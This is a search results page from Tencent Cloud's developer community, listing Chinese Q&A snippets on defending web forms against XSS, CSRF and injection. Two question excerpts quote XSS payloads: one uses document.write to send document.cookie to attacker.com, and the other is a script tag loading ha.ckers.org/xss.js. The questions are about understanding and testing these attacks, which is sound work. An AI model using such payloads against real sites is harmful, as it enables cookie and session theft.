腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
6
回答
如何确保网站安全检查
security
、
web
、
xss
如何保护窗体免受脚本注入
攻击
。这是最常用的
攻击
形式之一,
攻击
者试图通过
表单
字段插入
JS
脚本。这种情况下的验证必须检查
表单
域中的特殊字符。在互联网/jquery等网站上寻找建议和建议,以获得允许的字符和字符掩码验证
JS
代码。
浏览 2
提问于2010-02-16
得票数 1
回答已采纳
1
回答
单页网站中的JavaScript或React数据库安全性
javascript
、
html
、
database
、
reactjs
、
contact-form
它还将包含联系人
表单
,将用户带到不同的页面。我决定创建一个数据库,因为在网站上,我将做一些响应功能,即。预定没有预定日期的日历。到目前为止,我所有的项目都是用香草
js
写
的。我确实研究过,并大致知道使用它的缺点和道具,但我找不到答案,如果react提供了一些额外的安全功能,而不是使用普通的
js
攻击
到网站,如果是,是否有意义,
写
整个项目的反应只是为了这些功能?
浏览 0
提问于2019-05-25
得票数 0
回答已采纳
1
回答
通过PHP
表单
的SVG源代码
php
、
security
、
svg
我必须通过PHP
表单
发送SVG源代码,将其保存在数据库中并显示在管理面板中。@编辑:我需要一些解决方案来检查SVG代码是否有效,并且不包含任何
JS
、HTML代码。或者-我需要一些解决方案来安全地查看网站上的SVG代码。
浏览 2
提问于2013-08-23
得票数 0
1
回答
在firebug或chrome developer中更改javascript变量客户端
php
、
javascript
、
knockout.js
、
firebug
、
google-chrome-devtools
我正在尝试验证我
写
的一些代码是安全的,我想确保我采取的防止“黑客
攻击
”(更改
JS
变量)的步骤是有效的。我听说从客户端改变javascript变量是可能的,但我从来没有学会怎么做。我使用的是knockout.
js
表。可以从我的数据库中添加项目。当用户提交
表单
时,我将数据发送到PHP页面,然后PHP页面检查所有输入,以确保它们是有效的,并且与存储在数据库中的常量相同。
浏览 0
提问于2013-04-17
得票数 0
回答已采纳
2
回答
如何防止脚本执行,但在DOM中显示它?
javascript
、
html
、
security
、
textarea
我的html中有一个textarea,bottom.when中有一个button按钮,我想在数据库中添加textarea的内容,使用JQuery,我想在DOM中显示它,但是这很容易受到
攻击
,因为可能有人在
写
这个:如何防止在DOM中插入并显示代码而不是运行代码(就像facebook显示<script>标记而不允许执行) 这个漏洞是
攻击
textarea
表单
的唯一方法吗?
浏览 4
提问于2013-11-07
得票数 0
回答已采纳
1
回答
用于
表单
验证的ReqEx表达式
regex
、
xss
我正在尝试添加
表单
验证到我的html网站,以防止xss注入
攻击
。有什么想法吗?也开放的其他方法,以防止xss
攻击
,但我在这方面非常缺乏经验,所以请保持它尽可能简单。
浏览 0
提问于2011-12-26
得票数 0
1
回答
如何保护Koa.
js
应用程序免受CSRF
攻击
?
javascript
、
csrf
、
middleware
、
koa
、
koa2
我知道Cross-Site Request Forgery (CSRF)是一种
攻击
,它迫使用户在他们已经登录的web应用程序上执行无意的操作。我想阻止CSRF调用我的基于Koa.
js
的API和
表单
提交。这是一个基于JWT的应用程序。 通常框架都有防止或保护CSRF的插件。但是,当您使用Koa.
js
时,如何防止此类CSRF
攻击
?
浏览 33
提问于2021-01-18
得票数 1
1
回答
在
表单
中使用$_SERVER['REQUEST_URI']的安全风险
php
、
security
我使用echo $_SERVER['REQUEST_URI'];将HTML
表单
的部分输出给用户。我担心跨站点脚本
攻击
的潜在可能性,在这种情况下,可以在页面中插入到离站点JavaScript文件的链接。但是,我不能在输出中筛选"=“,因为它是查询字符串的相关部分。过滤等号输出是否足以防止CSS
攻击
?或者仅仅是一种糟糕的做法(使用用户在
表单
中生成的GET查询字符串)?<script type="text/javascript"> malici
浏览 1
提问于2014-07-05
得票数 0
回答已采纳
2
回答
本地注入的javascript文件可以做什么?
xss
、
javascript
现在,与众所周知的安全问题相反,这一
攻击
只针对黑客一方,因为除了黑客本人之外,没有任何数据显示给其他用户。我仍然很好奇这次黑客
攻击
是否会对项目本身造成危险。黑客能比我想象的更严重吗?
浏览 0
提问于2018-04-22
得票数 1
回答已采纳
4
回答
CSRF保护的真正目的是什么?
django
、
security
、
csrf
、
django-csrf
我很久以前就听说过CSRF,大多数时候我听到的是: 嗯,这不是100%的事实,对吗?
浏览 7
提问于2012-04-20
得票数 14
2
回答
href CSRF预防的最佳实践?
csrf
我正在为我的网站
写
一个基本的留言板插件。版主将在每个帖子上有href链接来删除,取消批准,编辑等。什么是最好的方法来防止CSRF
攻击
这些链接?我能想到的唯一办法就是为每个链接创建一个带有隐藏标记的
表单
,然后让href使用javascript提交
表单
,但这似乎是一个非常笨拙的解决方案。有没有更好的方法?
浏览 3
提问于2011-03-01
得票数 0
回答已采纳
3
回答
关于一种XSS
攻击
的问题
xss
引用自: 正如这里很多人可能知道的那样,当前的XSS
攻击
通常有两种形式:1-
攻击
者将标签上传到具有XSS漏洞的公共布告板、博客或其他站点,其他许多用户也会访问。
攻击
者通常会获取站点cookie以供以后的用户模拟使用,但有时会使用
表单
提交和其他
攻击
。这就是我与许多人交谈时认为XSS是什么。document.write("<img src=http://attacker.com/” + document.cookie + “>”)</scr
浏览 3
提问于2010-04-12
得票数 1
回答已采纳
2
回答
当其他控件处于焦点时隐藏窗体
c#
、
windows
、
winforms
、
visual-studio-2008
、
focus
但是,当我与原始
表单
一起移动或单击原始
表单
中的某处时,我想隐藏
表单
。新
表单
位于原始
表单
的后面。我尝试过像lostfocus这样的活动,但是没有帮助。所以我想我需要一些技巧来检查我的控件中是否有点击parrent
表单
(原始
表单
)或其他一些黑客
攻击
。我知道最好的方法是我
写
代码,但我有很多行,所以我认为最好的方法是如果你从总体上帮助我,然后我尝试应用到我的应用程序中。
浏览 0
提问于2012-02-14
得票数 2
回答已采纳
2
回答
使用phonegap替代移动应用程序的html组合框
mobile
、
dojo
、
cordova
我正在尝试
写
一个移动版本的我们的网站。这是一个包含多个字段的简单
表单
,其中一些字段是组合框。我正在使用dojo和phonegap来尝试制作一个在所有移动设备上都能工作的界面。我编写了一些
js
,将用户发送到另一个显示列表的屏幕,并在选择列表项时将其填充到
表单
文本框中。这看起来像是一个黑客
攻击
,只能在模拟器上运行,不能在我的android设备上运行。
浏览 2
提问于2011-11-05
得票数 3
回答已采纳
2
回答
使用正则表达式防止SQL注入
.net
、
sql-server
、
sql-injection
我正在
写
一个
表单
生成器程序,我必须
写
一个复杂的搜索用户控件,所以这一次对我来说没有其他方法(我想)! 无论如何,我正在寻找一个正则表达式来检查输入字符串(服务器端)是否有任何类似查询的
攻击
。
浏览 0
提问于2011-02-20
得票数 0
2
回答
是没有通过浏览器“发送”name=的输入字段。
tls
、
web-application
、
web-browser
、
php
、
credit-card
没有name属性的输入字段是否容易受到MITM
攻击
(w/ or )或任何其他
攻击
的影响?4111111111111111"></label></form> 我所做的是使用javascript获取值,然后将其发送到stripe.
js
,接收令牌,然后在向服务器提交
表单
之前清除CC字段的所有值。
浏览 0
提问于2014-08-20
得票数 2
回答已采纳
1
回答
GWT -xss(跨站点脚本)演示
google-app-engine
、
gwt
、
xss
我一直在通过gwt (V2.4.0)演示一个示例xss
攻击
,.I创建了一个带有html文本区域和提交按钮的
表单
(GET方法),在提交时它通过gwt rpc调用服务器,如果存在xss漏洞,示例测试用例//<SCRIPT SRC=http://ha.ckers.org/xss.
js
></SCRIPT> //不应该是filtered.But --这不起作用,请分享如何执行xss
攻击
?
浏览 2
提问于2012-07-21
得票数 1
2
回答
这是Django的CSRF保护的工作方式吗?
django
、
django-csrf
在POST
表单
包含csrf_token标签,相关视图将RequestContext传递给模板的情况下,请求页面意味着Django包含一个隐藏的
表单
字段,其中包含字母数字字符串。当收到
表单
提交时,Django会检查隐藏
表单
字段中的字母数字字符串值是否与从浏览器接收到的csrftoken cookie匹配。如果它们不匹配,则发出403响应。CSRF
攻击
可能以包含iframe的恶意网站的形式出现。iframe包括一个POST
表单
和一些JavaScript。
表单
的action属
浏览 3
提问于2012-07-23
得票数 10
回答已采纳
1
回答
Codeigniter
表单
帮助器
php
、
codeigniter
我一直想知道普通HTML输入标记和codeigniters
表单
辅助标记()之间的区别是什么?
浏览 1
提问于2011-12-01
得票数 1
回答已采纳
2
回答
网站尚在开发中注册的新WordPress用户
wordpress
、
security
最近,我开始了一个新的WordPress博客,没有为用户注册添加任何
表单
。但是我从我的网站上收到一封电子邮件说新用户已经注册了。不过,我没有
写
任何帖子,也没有做任何广告。我还在建造它。现在我的问题是,2)他们已登记为订户,我是否可以安全地删除? 专家提供的任何指导都将受到高度赞赏。请告诉我我该怎么做?谢谢。
浏览 5
提问于2017-04-29
得票数 0
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
vue.js初入门——十表单控件绑定
这样写的 JS 代码看着就很舒服
原生JS写一个简单的网站树形菜单
JS可以写操作系统?Windows 95被装进Electron App
挑战不可能:只用6个字符,写JS程序
热门
标签
更多标签
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
活动推荐
运营活动
广告
关闭
领券